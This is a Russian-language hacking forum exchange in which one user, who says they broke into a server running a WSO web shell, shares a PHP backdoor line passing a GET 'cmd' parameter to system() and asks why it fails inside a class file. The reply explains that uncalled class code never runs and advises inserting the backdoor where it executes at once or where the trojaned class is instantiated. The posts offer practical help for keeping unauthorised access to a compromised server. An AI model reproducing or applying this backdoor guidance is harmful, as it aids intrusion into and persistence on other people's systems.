24.12.2015, 13:41
|
|
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
Провел на форуме:
25535
Репутация:
22
|
|
Сообщение от blackbox
↑
В общем залился на сервер, подумал что нужно забекдорить пару файлов, но тут довольно странная ситуация возникла. Например я взял файл из диры, где лежит мой WSO (в файле описан простенький класс), добавил туда банальное:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);
}[/COLOR][/COLOR]
Но ничего не работает. Создал в папке чистый файл с этим содержимым - вывод отображается. В папке выше лежит htaccess, но там вроде ничего странного не нашел, только rewrite rules. Что это может быть?
если в файле описан класс это не значит что экземпляр этого класса создаётся в этом же скрипте
к примеру имеем следующий код в файле test.php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
в данном случае вызова system() не произойдёт если вы обратились к данному скрипту в виде test.php?cmd=whoami, потому что в этом скрипте только определили функцию но не вызвали её
а вот в таком случае всё отработает:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
отработает потому что test() вызывается в этом же скрипте
либо вставляйте свой код в место в котором он тут же выполнится, либо ищите где и когда создаётся объект протрояненного класса и уже обращайтесь к скрипту в котором идёт создание этого объекта и работа с его методами
|
|
|